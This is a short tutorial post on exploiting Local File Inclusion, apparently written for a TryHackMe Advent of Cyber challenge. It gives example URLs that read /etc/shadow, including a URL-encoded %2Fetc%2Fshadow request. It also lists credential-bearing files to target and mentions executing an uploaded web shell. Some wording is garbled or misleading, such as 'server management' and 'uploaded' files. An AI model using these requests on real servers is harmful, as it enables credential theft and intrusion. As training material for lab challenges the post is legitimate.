How to exploit Website’s Local File Inclusion vulnerability?

This article will explain what a local file is and how we can use it to exploit the computer. You can use this knowledge to solve Christmas Advent of Cyber ​​challenge number 14!

How to exploit the Local File Inclusion vulnerability

Some web applications will take the contents of the file and upload it to the website. Or the application can include it in the document and parse it as part of the programming language.

For example, if a web application has the following path:

https://example.com/?include_file=file1.php

This link will get content from file1.php and display it on the web. If an application does not whitelist what files can be uploaded and accessed via the path, the user can request the /etc/shadow file, which shows all encrypted users on the system running web application.

When the web application contains a file, it reads the file with the permissions of the user running the web server. For example, if user joe runs the webserver, it will read the file with the permissions of joe, if run as root, it will have the permissions of the root user. It’s a good idea to anticipate this when creating files, first try to create a file that you know the web server has read permission (such as robots.txt if the web server has it), to see if it’s vulnerable. exploit this way or not.

With the Local File Inclusion vulnerability, you can try and view the following files to assist you in server management.

• /etc/shadow – View encrypted passwords of all users on the system
• server.js or index.js – If the application is written in NodeJS, these are common filenames containing the main code of the application – API credentials may be exposed.
• /etc/hosts – Contains information about what other devices the web server is communicating with on the network.
• /uploads/evil.php – If you upload your own web shell to a web server, you can execute it using this vulnerability.

Tips for completing the challenge

Some web servers will treat every slash (/) as a path to the new page, but what if we want to dig into a file like /etc/shadow?

https://example.com/notes/?include=/etc/shadow

The server will think it will access /notes/include/etc/shadow. So you can’t add a slash in the URL because the web server will think it’s accessing a different directory.

The solution is to use URL encoding. URL encoding replaces unsafe ASCII characters with ‘%’ followed by two hexadecimal digits. The slash (/) can be URL encoded as %2F. Hence we can change the path to:

https://example.com/notes/?include=%2Fetc%2Fshadow

This new request will access /notes/ and then convert %2F to a slash. So that’s it then.

https://meyerweb.com/eric/tools/dencoder/ – This is a useful URL encoder and decoder you can use.

Also, you can see how to solve shodan.io on TryHackMe here.